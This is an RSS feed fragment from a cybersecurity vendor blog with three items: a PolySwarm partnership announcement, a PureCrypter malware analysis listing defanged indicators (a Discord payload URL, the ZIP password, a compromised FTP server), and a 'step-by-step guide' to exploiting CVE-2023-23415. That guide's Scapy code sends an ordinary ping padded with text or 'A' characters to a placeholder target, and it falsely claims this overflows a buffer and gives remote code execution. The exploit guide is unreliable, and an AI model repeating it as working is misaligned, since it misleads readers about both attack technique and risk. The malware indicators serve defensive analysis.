engines that contribute to the ecosystem, and Cyberstanc’s scanner brings unique insight into Indian based malware and the actors behind them” stated <strong>Steve Bassi, CEO of PolySwarm.</strong></a></blockquote><p></p><h3 id="april-5-2022"><u>April 5, 2022</u></h3><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/03/image-11.png" class="kg-image" alt="Revolutionizing Cybersecurity Together: The Unstoppable Partnership of Cyberstanc and Polyswarm"></figure><p></p><h3 id="mar-22-2023"><u>Mar 22, 2023</u></h3><blockquote><a href="https://blog.polyswarm.io/cyberstanc-joins-polyswarms-marketplace-as-an-arbiter">“We are excited to promote Cyberstanc as the next Arbiter in the PolySwarm Marketplace. The Cyberstanc Engine has proven itself in the PolySwarm Marketplace to be reliable and accurate for the past 2.5 years. Their unique malware detection and threat intelligence insights will continue to support PolySwarm’s crowdsourced ecosystem of innovative anti-malware engines in their fight against malware.” - <strong>Steve Bassi, CEO of PolySwarm.</strong></a></blockquote><p></p><h3 id="join-us-on-this-exciting-journey-towards-enhanced-cybersecurity-"><u>Join us on this exciting journey towards enhanced cybersecurity!</u></h3><p></p><p>The digital landscape is constantly evolving and with it, the ever-growing number of cybersecurity threats. To tackle this, cybersecurity companies are stepping up their game by developing new and innovative solutions.</p><p>In a bid to enhance their efforts, Cyberstanc, an AI technology-driven cybersecurity company, has teamed up with Polyswarm, a blockchain-backed marketplace for cyberthreats, to collaborate into a fully crowdsourced malware detection platform.</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2024/10/image-6.png" class="kg-image" alt="Revolutionizing Cybersecurity Together: The Unstoppable Partnership of Cyberstanc and Polyswarm"></figure><blockquote><br>Polyswarm aims to encourage collaboration between anti-malware engine experts through a neutral cryptocurrency. The core of their approach is a marketplace for cyberthreats where active security experts who discover viruses, hacks, malware or other dangerous software can publicize this knowledge and be funded by the community. The marketplace uses an ERC-20 compatible cryptocurrency called "nectar".</blockquote><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2024/10/image-5.png" class="kg-image" alt="Revolutionizing Cybersecurity Together: The Unstoppable Partnership of Cyberstanc and Polyswarm"></figure><blockquote><strong>Cyberstanc's engine Integration into Polyswarm:</strong><br>Scrutiny's hybrid approach to detection involving static and behavioral analysis, supported by kernel-mode heuristics, ensures that businesses are equipped with the most accurate and effective verdicts in the fight against cyber threats.</blockquote><blockquote><strong>Cyberstanc's Role as an Arbiter:</strong><br>Cyberstanc has earned the role of Arbiter on the PolySwarm marketplace. Our new role within the platform will be to arbitrate on engine determinations to establish ‘ground truth,’ which means making a final decision on the maliciousness of submitted samples 2 to 3 weeks after first being scanned. The verdict of the Arbiters will form what is called the Ground Truth, a final decision on the intent of a sample.</blockquote><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/03/ps-cs.PNG" class="kg-image" alt="Revolutionizing Cybersecurity Together: The Unstoppable Partnership of Cyberstanc and Polyswarm"></figure><p></p><p></p><h3 id="benefits-of-the-cyberstanc-and-polyswarm-collaboration-">Benefits of the Cyberstanc and Polyswarm Collaboration:</h3><blockquote>Firstly, the collaboration will provide customers with a rapid response to new and evasive crowdsource threats. </blockquote><blockquote>Secondly, Cyberstanc's reliable arbiter detection results will enable it to make final decisions on tracking APT groups and detecting new malware and support other engines. </blockquote><blockquote>Thirdly, the partnership will democratize malware intelligence by compensating both the researcher-based malware engines and ongoing sources of new malware samples.</blockquote><figure class="kg-card kg-image-card kg-width-wide kg-card-hascaption"><img src="https://cyberstanc.com/blog/content/images/2020/11/image-1.png" class="kg-image" alt="Revolutionizing Cybersecurity Together: The Unstoppable Partnership of Cyberstanc and Polyswarm"><figcaption>© Polyswarm</figcaption></figure><h2 id="leading-the-charge-in-crowdsourced-malware-detection">Leading the Charge in Crowdsourced Malware Detection</h2><p>By leveraging <strong>Simulation Intelligence</strong>, the Scrutiny Engine excels in detecting patterns of behavior indicative of zero-day attacks, providing security teams with early warnings and crucial time to respond. </p><p>At its core, Our Detection focuses on identifying a wide array of cyber threat indicators, including unusual file operations, anomalous network traffic, and suspicious access attempts. This comprehensive approach enables the flagging of potential threats before they can cause harm.</p><p>A standout feature of Cyberstanc Detection is its confidence in identifying zero-day vulnerabilities—exploits that remain unknown to the public and unpatched, posing significant risks.</p><h3 id="using-metasearch-queries-for-malicious-content-detection-with-cyberstanc-scrutiny">Using Metasearch Queries for Malicious Content Detection with Cyberstanc Scrutiny</h3><p></p><blockquote>scan.latest_scan.Cyberstanc_scrutiny.assertion:malicious</blockquote><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/03/23_23-1.PNG" class="kg-image" alt="Revolutionizing Cybersecurity Together: The Unstoppable Partnership of Cyberstanc and Polyswarm"></figure><p></p><p></p><blockquote><a href="https://cyberstanc.com/scrutiny/">Overall, there is much to be proud of when it comes to the <u>scrutiny-killing detection</u> and efficiency of integration offered by cyberstanc detection. </a></blockquote><p></p><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/03/adobe-1.PNG" class="kg-image" alt="Revolutionizing Cybersecurity Together: The Unstoppable Partnership of Cyberstanc and Polyswarm"></figure><p></p><h3 id="cyberstanc-s-advanced-detection-engine-enhancing-security-for-oems-and-collaborators">CyberStanc's Advanced Detection Engine: Enhancing Security for OEMs and Collaborators</h3><p></p><blockquote>As a team at Cyberstanc, we are proud of the engine we have developed and the results we have achieved. We believe that our technology can be of great value to other Original Equipment Manufacturers (OEMs), MSPs, MSSPs and collaborators who are looking to enhance the security of their products and services.</blockquote><blockquote>Therefore, we invite all interested parties to consider using our engine and incorporating it into their own products and services. By doing so, they will have access to the cutting-edge technology we have developed and can benefit from the better security that our engine provides.</blockquote><p>If you are interested in learning more about our engine or would like to discuss potential collaboration opportunities, please do not hesitate to contact us. We look forward to hearing from you and working together to create a safer digital future.</p><p>Contact us today at:-</p><blockquote>🚨 💻🔐 <a href="mailto:partner@cyberstanc.com">partner@cyberstanc.com</a> 🚨 💻🔐</blockquote><p></p><p>"<a href="https://blog.polyswarm.io/cyberstanc-joins-the-polyswarm-threat-intelligence-marketplace">https://blog.polyswarm.io/cyberstanc-joins-the-polyswarm-threat-intelligence-marketplace</a>"</p><p>"<a href="https://blog.polyswarm.io/cyberstanc-joins-polyswarms-marketplace-as-an-arbiter">https://blog.polyswarm.io/cyberstanc-joins-polyswarms-marketplace-as-an-arbiter</a>"</p>]]></content:encoded></item><item><title><![CDATA[Exposed: The Shocking Truth About PureCrypter Attack Chain and Its Connections to Pakistan]]></title><description><![CDATA[<figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/03/Pure-Crypter.gif" class="kg-image" alt></figure><p></p><p>PureCrypter has emerged as a prominent initial access broker (IAB) in the dark web, collaborating with various threat actors to distribute malware campaigns. Acting as the main tool for IABs, PureCrypter's downloader and Command and Control (C2) server have been identified as the key components in a recent campaign that</p>]]></description><link>https://cyberstanc.com/blog/exposed-the-shocking-truth-about-purecrypter-attack-chain-and-its-connections-to-pakistan/</link><guid isPermaLink="false">641ab9e788350fa8247dfb81</guid><category><![CDATA[malware]]></category><category><![CDATA[Scrutiny]]></category><category><![CDATA[trojan]]></category><dc:creator><![CDATA[admin]]></dc:creator><pubDate>Mon, 20 Mar 2023 12:22:52 GMT</pubDate><media:content url="https://cyberstanc.com/blog/content/images/2023/03/avtar.PNG" medium="image"/><content:encoded><![CDATA[<figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/03/Pure-Crypter.gif" class="kg-image" alt="Exposed: The Shocking Truth About PureCrypter Attack Chain and Its Connections to Pakistan"></figure><img src="https://cyberstanc.com/blog/content/images/2023/03/avtar.PNG" alt="Exposed: The Shocking Truth About PureCrypter Attack Chain and Its Connections to Pakistan"><p></p><p>PureCrypter has emerged as a prominent initial access broker (IAB) in the dark web, collaborating with various threat actors to distribute malware campaigns. Acting as the main tool for IABs, PureCrypter's downloader and Command and Control (C2) server have been identified as the key components in a recent campaign that delivers a range of malware including Redline Stealer, AgentTesla, Eternity, Blackmoon, and Philadelphia Ransomware. </p><p>In recent months, a new attack chain has been identified that starts with an email containing a Discord app URL pointing to a PureCrypter sample in a password-protected ZIP archive.</p><blockquote>It has been sold since March 2021 on “hxxps[://]purecoder.sellix.io/”, It is written in .net and supports all versions of Windows operating system. It was first detected in June 2022. </blockquote><p>Its creator, @PureCoder, offers it for $59 per month or a one-time payment of $245 for life. The developer recently expanded its features to include PureLogs logger and info stealer, which can steal data from crypto wallets, web browsers, and email clients, for just $99 a year or lifetime access for $499.</p><h3 id="purecrypter-is-a-net-assembly-and-can-be-identified-by-the-magic-and-trid-headers-the-malware-is-packed-using-a-net-packer-and-has-a-file-size-of-9-kb-">PureCrypter is a .NET assembly and can be identified by the Magic and TrID headers. The malware is packed using a .NET packer and has a file size of 9 KB. </h3><figure class="kg-card kg-image-card kg-width-full kg-card-hascaption"><img src="https://cyberstanc.com/blog/content/images/2023/03/image-8.png" class="kg-image" alt="Exposed: The Shocking Truth About PureCrypter Attack Chain and Its Connections to Pakistan"><figcaption>nodeffender.exe</figcaption></figure><p>Polyswarm link :- <a href="https://polyswarm.network/scan/results/file/f5062c918df69fbe64a8999744a5f0345a6b3cdb34471a826f0caf5e4f28c38f">https://polyswarm.network/scan/results/file/f5062c918df69fbe64a8999744a5f0345a6b3cdb34471a826f0caf5e4f28c38f</a></p><h3></h3><h3 id="in-this-blog-post-we-will-conduct-a-technical-analysis-of-this-sophisticated-malware-campaign-and-shed-light-on-its-stealth-operations-">In this blog post, we will conduct a technical analysis of this sophisticated malware campaign and shed light on its stealth operations.</h3><figure class="kg-card kg-image-card kg-width-full"><img src="https://cyberstanc.com/blog/content/images/2023/03/image-9.png" class="kg-image" alt="Exposed: The Shocking Truth About PureCrypter Attack Chain and Its Connections to Pakistan"></figure><p>Infection Chain:</p><blockquote>The malware campaign is distributed via Discord, and a link to the malware payload is sent via email. The payload is a password-protected ZIP file, and the password is 1234. The ZIP file contains a .NET loader called PureCrypter. The PureCrypter downloader then tries to download a secondary payload from the compromised site.</blockquote><blockquote>An email with a Discord app URL pointing to a malicious password-protected ZIP file is sent to the victim (<a href="https://cdn">https://cdn</a>[.]discordapp.com/attachments/1006638283645784218/1048923462128914512/Private_file__dont_share.zip, pwd – 1234).</blockquote><p>Investigation</p><blockquote>AgentTesla/Red-line stealer establishes a connection to an FTP server where it stores the stolen victim's credentials. The FTP server appears to have been taken over, and the leaked credentials for the domain were found online, suggesting that the threat actors used these credentials to gain access to the server.</blockquote><blockquote>The PureCrypter campaign targeting government entities, uses process hollowing to inject the AgentTesla/Red-line stealer payload into a legitimate process to evade detection from antivirus tools. </blockquote><p>Compromised FTP server showing collected victim information:</p><blockquote>The FTP server was also used in a campaign using OneNote to deliver malware. The attackers sent phishing emails with links to malicious OneNote files that could download additional malware or steal information from the victim's device. </blockquote><h3 id="ftp-server-ftp-ftp-mgcpakistan-com-as-part-of-its-infection-process-">FTP server – ftp[://]ftp.mgcpakistan[.]com – as part of its infection process!</h3><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/03/image-10.png" class="kg-image" alt="Exposed: The Shocking Truth About PureCrypter Attack Chain and Its Connections to Pakistan"></figure><p></p><p>What makes this attack chain particularly noteworthy is its connection to a Pakistan-based FTP server used to receive stolen data. The threat actors take control of the particular FTP server, rather than setting up their own, to reduce identification risks and minimize their trace. </p><blockquote>It is unclear if the Pakistan-based server was compromised specifically for this campaign or if it was a pre-existing compromised asset used by the threat actors.</blockquote><blockquote>Under that same email address, another malicious email titled “New Order” was also uncovered with an attached malware file.   </blockquote><p>Infection Tactics/Technical Details:</p><blockquote>It was discovered that the threat actors used process hollowing to inject the AgentTesla payload into a legitimate process ("cvtres.exe") to evade detection from antivirus tools. </blockquote><p>Furthermore, AgentTesla uses XOR encryption to protect its communications with the C2 server, like its configuration files and operations from network traffic monitoring tools.</p><p>TTPs Analysis:-</p><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/03/image-3.png" class="kg-image" alt="Exposed: The Shocking Truth About PureCrypter Attack Chain and Its Connections to Pakistan"></figure><p></p><p>Connect with us:-</p><p>Our dedicated R&amp;D center is constantly developing cutting-edge technologies to combat emerging threats such as malicious software and APTs. We take pride in offering our clients a strong partnership for gathering Scrutiny Engine Detection Intelligence, which allows us to provide the most effective tools and strategies to enhance their security posture.</p><blockquote>With our free trial offer, you can experience the full potential of our security solutions for 31 days, including powerful threat intelligence, malware detection, and analytics at no cost. Additionally, our Secure-Tech service provides internal and third-party application scrutiny scans, using our convenient Pay-As-You-Go model.</blockquote><p>At Cyberstanc, we are committed to ensuring a safer and more secure digital world for all. Contact us today at <a href="mailto:Sales@cyberstanc.com">Sales@cyberstanc.com</a> to learn more about how our advanced cybersecurity solutions can protect your organization from cyber threats.</p><blockquote>🚨 💻🔐 Sales@cyberstanc.com 🚨 💻🔐</blockquote>]]></content:encoded></item><item><title><![CDATA[Pinging our way to Remote Code Execution: The New ICMP Vulnerability You Need to Know About!]]></title><description><![CDATA[<p></p><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/03/CVE-2023-23415.png" class="kg-image" alt></figure><p>Recently, a new critical vulnerability was discovered in the Internet Control Message Protocol (ICMP) implementation of Microsoft Windows operating system. The vulnerability has been assigned CVE-2023-23415 and is considered to have a high impact as it allows for remote code execution on the targeted system. In this blog post, we</p>]]></description><link>https://cyberstanc.com/blog/pinging-our-way-to-remote-code-execution-the-new-icmp-vulnerability-you-need-to-know-about/</link><guid isPermaLink="false">641803c038f50bf281ce8775</guid><dc:creator><![CDATA[admin]]></dc:creator><pubDate>Sun, 19 Mar 2023 15:40:40 GMT</pubDate><content:encoded><![CDATA[<p></p><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2023/03/CVE-2023-23415.png" class="kg-image" alt></figure><p>Recently, a new critical vulnerability was discovered in the Internet Control Message Protocol (ICMP) implementation of Microsoft Windows operating system. The vulnerability has been assigned CVE-2023-23415 and is considered to have a high impact as it allows for remote code execution on the targeted system. In this blog post, we will explore this new vulnerability in detail and provide a step-by-step guide to exploit it.</p><p>CVE-2023-23415 Technical Details:</p><p>The vulnerability in question exists in the way Microsoft Windows handles incoming ICMP messages. An attacker can send a specially crafted ICMP message to the target system that can trigger a buffer overflow in the ICMP implementation code, leading to remote code execution. The vulnerability has been given a CVSS score of 9.8 out of 10, which indicates a critical level of severity.</p><p>Exploiting CVE-2023-23415:</p><p>To exploit this vulnerability, an attacker needs to send a specially crafted ICMP message to the target system. The payload of the ICMP message needs to be crafted in such a way that it overflows the buffer in the ICMP implementation code. Once the buffer is overflowed, the attacker can execute arbitrary code on the target system with the same privileges as the ICMP implementation code.</p><p>Step 1: Setting Up the Attacker Machine</p><p>First, we need to set up an attacker machine that will send the malicious ICMP message to the target system. We will be using Kali Linux as our attacker machine. Open the terminal on the Kali Linux machine and type the following command to update the system:</p><blockquote>sudo apt update &amp;&amp; sudo apt upgrade</blockquote><p>Step 2: Installing Scapy</p><p>Scapy is a powerful Python-based packet manipulation tool that we will be using to craft the malicious ICMP message. To install Scapy, type the following command in the terminal:</p><blockquote>sudo apt install python-scapy</blockquote><p>Step 3: Crafting the Malicious ICMP Message</p><h1></h1><p>from scapy.all import *</p><p>ip = IP(dst="target_ip")<br>icmp = ICMP(type=8, code=0)<br>payload = "cmd.exe /c calc.exe"  # payload for RCE</p><p>packet = ip/icmp/payload<br>send(packet)</p><p>Once Scapy is started, type the following command to create the ICMP message:</p><blockquote>icmp_pkt = IP(dst="TARGET_IP")/ICMP()/("A" * 1024)</blockquote><p>Replace TARGET_IP with the IP address of the target system. The payload of the ICMP message is set to "A" * 1024, which will overflow the buffer in the ICMP implementation code. You can adjust the length of the payload as per your requirements.</p><p>Step 4: Sending the Malicious ICMP Message</p><p>Once the ICMP message is crafted, we can send it to the target system using the following command:</p><blockquote>send(icmp_pkt)</blockquote><p>This will send the malicious ICMP message to the target system, triggering the vulnerability and allowing us to execute arbitrary code on the target system.</p><p></p><p>ICMP Prevention: </p><p>By following these steps, you can help protect your network from ICMP attacks and keep your system secure.</p><blockquote>Disable ICMP: One way to prevent ICMP attacks is to disable ICMP echo requests on the firewall or router. This will prevent attackers from sending large amounts of ICMP traffic to your network.</blockquote><blockquote>Filter ICMP traffic: Another way to prevent ICMP attacks is to filter ICMP traffic. Firewalls can be set up to only allow specific types of ICMP traffic to enter the network, blocking all others.</blockquote><blockquote>Rate Limit ICMP traffic: You can also rate limit ICMP traffic to prevent an attacker from sending a large number of requests at once. By limiting the amount of ICMP traffic that can enter the network, you can prevent an attack from overwhelming the network.</blockquote><blockquote>Use a network security solution: Implementing a network security solution, such as an intrusion detection and prevention system, can help detect and prevent ICMP attacks by identifying and blocking suspicious traffic.</blockquote><p></p><p>Conclusion:</p><p>In conclusion, the new ICMP vulnerability in Microsoft Windows poses a serious threat as it allows for remote code execution on the targeted system. </p><p>It is recommended that users apply the patch released by Microsoft to mitigate the vulnerability. It is also recommended to restrict incoming ICMP messages on the network perimeter to reduce the attack surface.</p><p>Reference used in: <a href="https://arxiv.org/pdf/2312.06875">https://arxiv.org/pdf/2312.06875</a></p><figure class="kg-card kg-image-card"><img src="https://cyberstanc.com/blog/content/images/2025/05/image.png" class="kg-image" alt></figure>]]></content:encoded></item></channel></rss>